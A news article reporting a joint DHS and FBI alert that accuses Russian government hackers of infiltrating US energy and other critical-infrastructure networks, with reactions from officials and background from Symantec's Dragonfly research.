The Trump administration on Thursday accused Russian government hackers of carrying out a deliberate, ongoing operation to penetrate vital U.S. industries, including the energy grid — a major ratcheting up of tensions between the two countries over cybersecurity.
It says the hackers penetrated targeted companies to a surprising degree, including copying information that could be used to gain access to the computer systems that control power plants. It’s the kind of access that experts say would have given Moscow the ability to turn off the power if it wanted to.
The alert came eight months after leaked documents revealed that federal authorities had found evidence of foreign hackers breaching computer networks in U.S. power companies, including the operator of the Wolf Creek nuclear plant in Kansas.
“Since at least March 2016, Russian government cyber actors … targeted government entities and multiple U.S. critical infrastructure sectors, including the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors,” according to Thursday’s joint alert, issued by the Homeland Security Department and the FBI.
While the reveal isn’t a surprise to cyber watchers — researchers have been noting such digital espionage for years — it’s rare for the U.S. government to be so blunt about a foreign adversary’s cyber spying. Because the U.S. conducts its own similar online espionage campaigns around the world, intelligence officials have traditionally been loath to openly point fingers at other governments for doing the same thing.
After the alert, Energy Secretary Rick Perry warned members of a House Appropriations subcommittee Thursday that he’s “not confident” the federal government has an adequate strategy in place to address the “hundreds of thousands” of cybersecurity attacks directed at the U.S. every day.
Sen. Maria Cantwell of Washington state, the top Democrat on the Energy and Natural Resources Committee, said Thursday’s alert followed a long series of unanswered warnings about the danger that hackers could trigger economically devastating blackouts.
“A year ago yesterday, I called for a Russian cyber threat assessment to our grid,” Cantwell said in a statement. “I’ve repeatedly asked President [Donald] Trump to tackle this urgent task and have been met with deafening silence. I hope today’s belated response is the first step in a robust and aggressive strategy to protect our critical infrastructure.”
The alert comes on the same day the Trump administration issued new sanctions against Russia for a range of activities, including its actions in cyberspace. Taken together, the steps amount to perhaps the most direct confrontation of Russian hackers by the U.S. government yet.
Russia has been widely accused of launching increasingly dangerous attacks on power grids around the world. Moscow’s most frequent target has been Ukraine, according to researchers. In recent years, Ukraine has twice blamed its neighbor for shutting down portions of its power grid using digital weapons that hackers had not previously successfully deployed on that scale.
The alert says Russian hackers attempted to access the American grid and other industries primarily to spy and collect information. Their weapons included malware-laden Word documents — such as engineers’ resumes — that appeared in legitimate-seeming emails, but which harvested login and password information from victims’ computers.
The hackers used these exploits to target vendors and other companies on the periphery of their main targets, then leapfrog their way to gain access to higher-level networks and install malware.
Once inside, the hackers would move around and conduct reconnaissance, and appeared interested in industrial control systems that manage processes for critical infrastructure, the alert reads.
“The threat actors appear to have deliberately chosen the organizations they targeted, rather than pursuing them as targets of opportunity,” the alert says.
It says the hackers also used other means to find their way in. In one case, they “downloaded a small photo from a publicly accessible human resources page. The image, when expanded, was a high-resolution photo that displayed control systems equipment models and status information in the background.”
They also implanted malware in the websites of trade publications and other websites related to the targeted industries, the alert says.
According to Jon Wellinghoff, a former chairman of the Federal Energy Regulatory Commission who now runs his own energy policy consultancy, the hackers seemed to be gathering intelligence “that could provide them with information in the future to do something if they wanted to.”
Essentially, they were setting the stage to potentially turn off the power, cyber experts said.
The details closely dovetail with research published in October by cyber firm Symantec. The government alert even confirmed that the Symantec report — which didn’t attribute the cyber activity to any government — offered “additional information” about Russia’s digital efforts.
The Symantec report reveals that the cyberattacks described in Thursday’s alert stretch back much further than 2016. According to Symantec, the hacking group, which it dubbed Dragonfly, started around 2011, targeting western energy-sector companies, including in the U.S., Turkey and Switzerland.
Though the group was dormant through much of 2014 and 2015, it restarted its digital probing in late 2015 with a campaign that sent fake New Year’s Eve party invites to energy-sector targets, Symantec said.
By 2017, the group had ramped up these malicious efforts, according to the research.
Kevin McIntyre, chairman of the Federal Energy Regulatory Commission — which oversees the energy sector — said the information contained in the alerts showed the need to remain vigilant on cybersecurity.
“Frankly, some of it is a little bit scary,” he told reporters on Thursday. “But we keep our eye on the ball and focus on it so that we try our best as an agency.”
Perry, meanwhile, expressed misgivings about federal cybersecurity efforts.
“I’m not confident that the federal government has a broad strategy in place that is not duplicating, or is least duplicative as it can be,” Perry said after House Energy and Water Appropriations Subcommittee Chairman Mike Simpson (R-Idaho) called cybersecurity attacks “our biggest threat.”
“I’m as worried about cybersecurity as I am nuclear,” Simpson said. “I think we’re attacking it department-wide, but I’m not sure we’re attacking it government-wide.”